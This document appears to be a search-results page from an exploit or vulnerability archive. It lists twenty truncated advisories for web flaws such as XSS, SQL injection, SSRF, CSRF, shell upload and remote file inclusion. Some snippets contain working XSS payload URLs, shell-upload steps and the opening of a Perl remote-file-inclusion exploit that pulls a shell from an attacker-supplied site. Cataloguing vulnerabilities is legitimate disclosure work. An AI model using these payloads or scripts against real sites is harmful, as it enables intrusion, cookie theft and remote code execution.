20 matches found
Stored XSS in Question field due to lack of sanitization in Link.php
Description: Stored XSS. Cross-Site Scripting is a type of web application vulnerability that allows an attacker to inject malicious scripts into a website or web application. Unlike reflected XSS, where the malicious script is embedded in a URL and executed immediately, stored XSS involves the...
WSVuls - Website Vulnerability Scanner Detect Issues (Outdated Server Software And Insecure HTTP Headers)
WSVuls Website vulnerability scanner detect issues outdated server software and insecure HTTP headers. What's WSVuls? WSVuls is a simple and powerful command line tool for Linux, Windows and macOS. It's designed for developers/testers and for those workers in IT who want to test vulnerabilities a...
Like Button Rating < 2.6.32 - Unauthenticated Full-Read SSRF
The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF). On line 7493 in likebtnlikebutton.php a hook is set to allow unauthenticated ajax calls which will call the function likebtnprx. As the name suggests, this function works as a proxy and can ...
jobs.target.com XSS vulnerability
Open Bug Bounty ID: OBB-615835. Affected Website: jobs.target.com; Vulnerable Application: Custom Code; Vulnerability Type: XSS (Cross Site Scripting) / CWE-79; CVSSv3 Score: 6.1...
target.com.br XSS vulnerability
Vulnerable URL: https://www.target.com.br/portal/asp/cadastro/opt-out.asp?email=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E=A171 Details: Patched: Yes, at 26.07.2017; Latest check for patch: 26.07.2017 10:31 GMT; Vulnerability type: XSS; Vulnerability status: Publicl...
Apple iOS cookie mishandling vulnerability
Apple iOS is the latest operating system that runs on Apple's iPhone and iPod touch devices. A security vulnerability exists in Apple iOS that allows a remote attacker to set a special cookie for the target device on the target website...
WordPress Quasar Theme <= 1.9.1 - Privilege Escalation
Because of this vulnerability, the attackers can have an administrator account on the target's website. Solution Update the theme...
WordPress Platform Theme <= 1.6.2 - Privilege Escalation
Because of this vulnerability, the attackers can have an administrator account on the target's website. Solution Update the theme...
joomla components custompages 1.1 - Remote File Inclusion Vulnerability
No description provided by source. @ JOOmla Component custompages = 1.0 Sql Remote file Inclusion Author:Sniper456 Contact:Sniper456atttgmail.com Greetss: My chilean people Developer: Shawn Sandy License:Other open source / Free license Dork: 8=====B ! = Bug:...
JForum Cross Site Request Forgery
Version: All; Vulnerability: Cross-site request forgery; Problem type: remote; CVE ID: CVE-2013-7209. A CSRF vulnerability exists in the modify user permissions module of the JForum Admin module. Use the following code in JForum forum posts; as long as an administrator opens the post, the permissions o...
Free Monthly Websites 2.0 Administrator Remote Password Change
Title: Free Monthly Websites 2.0 Administrator Remote Password Change; Date: 10/04/2013; Name: Free Monthly Websites; Affected Version: 2.0; Vendor: http://www.freemonthlywebsites2.com/; Category: Web...
Free Monthly Websites 2.0 - Admin Password Change
Free Monthly Websites 2.0 - Admin Password Change. Title: Free Monthly Websites 2.0 Administrator Remote Password Change; Date: 10/04/2013; Name: Free Monthly Websites; Affected Version: 2.0; Vendor:...
CNELE SQL Injection
By: CR9; Greetz: Perspicacious Hackers In The World. Title: CNELE SQL Injection Vulnerability; Vendor: http://www.cnele.com; Author: CR9; Home: Http://Nopotm.ir; Archive: http://CR9Exploits.zio.ir; Email: [email protected]...
Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
Oracle JRE - java.net.URLConnection class – Same-of-Origin (SOP) Policy Bypass PDF: http://www.security-assessment.com/files/advisories/OracleJREjavaneturlconnectionSOPBypass.pdf CVE...
myPHPupload 0.5.1 Shell Upload
myPHPupload 0.5.1 Remote File Upload Vulnerability. Author: ViRuSMaN; Contact: [email protected]; Home: Islam-Attack.CoM , HackTeach.OrG; Download: http://www.graphiks.net/telecharger/myPHPupload.zip; Exp: 1- Upload your shell format "shell.php" 2- Go to The Pwd...
youtubeclone-sql.txt
Youtuber Clone UID Remote SQL Injection Vulnerability. Author: Hussin X; Home: www.tryag.cc/cc; email: darkangelg85atYahooDoTcom; script: http://www.greatclone.com/productinfo.php?cPath=30&productsid=86 ...
aproxcms-sql.txt
Viva IslaM Viva IslaM Remote SQL injection Vulnerability Aprox CMS Engine V5.1.0.4 index.php page AuTh0r : Mr.SQL H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f Email : [email protected] SYRIAN Arab HACkErS -: Exploite :-...
WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW)
WIYS v1.0 Cross-Site Scripting Vulnerability - 05.24.2007 NEW Vulnerability: http://www.target.com/index.php?Page=Sayfa&No="scriptalertdocument.cookie/script Vulnerable: WIYS v1.0 Google d0rk: Bu site FORSNET taraf?ndan WIYS Yaz?l?m?™ ile haz?rlanm?st?r. Script :...
mg.applanix131.txt
#!/usr/bin/perl Xmor$ DigitaL Hackin...
phpBurningPortal 1.0.1 - 'lang_path' Remote File Inclusion
!/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = "questdelete.php?langpath="; elsif $fileno eq 2 $file = "questedit.php?langpath="; elsif $fileno eq 3...